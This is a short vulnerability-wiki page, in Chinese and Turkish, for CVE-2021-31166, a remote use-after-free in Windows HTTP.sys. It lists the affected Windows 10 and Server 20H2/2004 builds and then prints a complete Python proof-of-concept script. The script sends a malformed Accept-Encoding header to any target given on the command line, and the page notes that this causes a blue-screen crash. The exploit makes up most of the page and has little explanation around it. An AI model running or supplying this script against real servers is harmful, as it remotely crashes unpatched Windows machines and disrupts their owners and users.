免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Güvenlik Açığı Etkisi
Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems
POC
⚠️️ POC yürütüldüğünde mavi bir ekran görünecektir.
# Axel '0vercl0k' Souchet - May 16 2021 import requests import argparse def main(): parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys') parser.add_argument('--target', required = True) args = parser.parse_args() r = requests.get(f'http://{args.target}/', headers = { 'Accept-Encoding': 'doar-e, ftw, imo, ,', }) print(r) main()
免费、自由、人人可编辑的漏洞库